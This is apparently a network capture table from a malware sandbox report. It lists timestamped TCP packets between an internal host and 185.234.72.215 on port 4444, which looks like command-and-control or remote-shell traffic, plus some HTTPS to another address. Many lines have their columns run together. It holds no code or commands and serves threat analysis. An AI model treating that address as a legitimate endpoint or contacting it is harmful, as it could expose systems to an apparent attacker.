Jan 4, 2025 00:02:47.037936926 CET  49909  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:47.043029070 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043041945 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043059111 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043067932 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043076038 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043083906 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043093920 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043102026 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043114901 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043123007 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043162107 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043170929 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043185949 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043194056 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043243885 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043252945 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043359041 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043366909 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043382883 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043391943 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043406963 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043415070 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043540955 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043550014 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043557882 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043566942 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.043575048 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.047669888 CET  4444   49909  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.142890930 CET  4444   49947  185.234.72.215  192.168.2.4
Jan 4, 2025 00:02:47.145173073 CET  49947  4444   192.168.2.4     185.234.72.215
Jan 4, 2025 00:02:47.150121927 CET  4444   49947  185.234.72.215  192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:47.150135040 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:47.150142908 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:47.150259018 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:47.150268078 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:47.150310040 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:47.150319099 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:47.907289028 CET499134444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:47.907459974 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:47.912544966 CET444449913185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:47.912699938 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.087302923 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.102689981 CET49954443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.102724075 CET4434995413.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.102797031 CET49954443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.104562044 CET49954443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.104597092 CET4434995413.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.207771063 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.212867022 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.212882996 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.212951899 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.212960958 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.212980032 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.212987900 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213051081 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213063955 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213102102 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213113070 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213151932 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213196039 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213257074 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213262081 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213309050 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213316917 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213366032 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213382006 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213408947 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213418007 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.213462114 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.767712116 CET4434995413.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.771251917 CET49954443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.771282911 CET4434995413.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.771673918 CET4434995413.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.773214102 CET49954443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.773284912 CET4434995413.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.939330101 CET499134444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.939558983 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.944191933 CET444449913185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.944408894 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:48.965754986 CET49954443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.032294989 CET499554444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.037235975 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.037302971 CET499554444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.037559032 CET499554444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042506933 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042521000 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042530060 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042538881 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042557955 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042567015 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042593002 CET499554444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042613983 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042623997 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042634010 CET499554444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042639971 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042649984 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042674065 CET499554444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.042704105 CET499554444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.047543049 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.047555923 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.047574043 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.047583103 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.047621012 CET499554444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.047667027 CET499554444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.047818899 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.047828913 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.047868967 CET499554444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.089510918 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.089853048 CET499554444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.119878054 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.137556076 CET444449955185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.195575953 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.200495005 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.200508118 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.200519085 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.200548887 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.200623035 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.200639963 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.200674057 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.200712919 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.200833082 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.200841904 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:49.200850964 CET444449909185.234.72.215192.168.2.4
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Jan 4, 2025 00:02:49.200859070 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:49.200872898 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:49.200886965 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:49.200916052 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:49.200923920 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:49.200983047 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:49.200992107 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:49.201042891 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:49.201051950 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:49.201061010 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:49.492062092 CET  4444         49955      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:49.492248058 CET  49955        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:49.965277910 CET  49913        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:49.965477943 CET  49908        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:49.970117092 CET  4444         49913      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:49.970258951 CET  4444         49908      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.144943953 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.237152100 CET  49909        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:50.242039919 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242052078 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242100954 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242110968 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242120028 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242127895 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242141962 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242150068 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242178917 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242187977 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242233038 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242242098 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242289066 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242296934 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242340088 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242347956 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242396116 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242408991 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242427111 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242434978 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242460966 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242469072 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242503881 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242511988 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242552042 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242559910 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242593050 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.242602110 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.458200932 CET  4444         49947      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.559585094 CET  49947        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:50.647613049 CET  49947        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:50.652554989 CET  4444         49947      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.652565956 CET  4444         49947      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.652574062 CET  4444         49947      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.652602911 CET  4444         49947      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.966696024 CET  49908        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:50.966758966 CET  49913        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:50.971591949 CET  4444         49908      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:50.971652985 CET  4444         49913      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.147902012 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.189332962 CET  49909        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:51.194361925 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194372892 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194494009 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194503069 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194547892 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194555998 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194610119 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194617987 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194636106 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194654942 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194691896 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194700003 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194823027 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194830894 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194880962 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.194890022 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.195029020 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.195036888 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.195046902 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.195106983 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.195115089 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.195122957 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.195142031 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.195151091 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.195198059 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.195205927 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.195244074 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.195250988 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.984679937 CET  49908        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:51.984798908 CET  49913        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:51.989566088 CET  4444         49908      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:51.989613056 CET  4444         49913      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.164623022 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.250044107 CET  49909        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:52.269987106 CET  49909        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:52.274967909 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.274979115 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275044918 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275062084 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275106907 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275115013 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275140047 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275147915 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275234938 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275243998 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275275946 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275284052 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275340080 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275348902 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275372028 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275379896 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275432110 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275439978 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275484085 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275492907 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.275501966 CET  4444         49909      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.408170938 CET  4444         49947      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.459064960 CET  49947        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:52.467067957 CET  49947        4444       192.168.2.4      185.234.72.215
Jan 4, 2025 00:02:52.471926928 CET  4444         49947      185.234.72.215   192.168.2.4
Jan 4, 2025 00:02:52.471936941 CET  4444         49947      185.234.72.215   192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.471976995 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.471986055 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472067118 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472075939 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472110033 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472117901 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472191095 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472199917 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472214937 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472242117 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472352982 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472362995 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472378969 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472387075 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:52.472431898 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.003895044 CET499134444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.004264116 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.010909081 CET444449913185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.013061047 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.186105013 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.246953011 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.356743097 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.361846924 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.361862898 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.361881971 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.361891031 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.361927986 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.361937046 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.361964941 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.361973047 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.361995935 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362016916 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362046003 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362054110 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362121105 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362128973 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362165928 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362174034 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362214088 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362225056 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362267017 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362296104 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362341881 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.362344980 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.486449957 CET4434995413.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.486514091 CET4434995413.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.486568928 CET49954443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.543967962 CET49954443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.543996096 CET4434995413.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.958992004 CET444449733185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.961483955 CET497334444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:53.966415882 CET444449733185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.014019966 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.014219999 CET499134444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.018946886 CET444449908185.234.72.215192.168.2.4
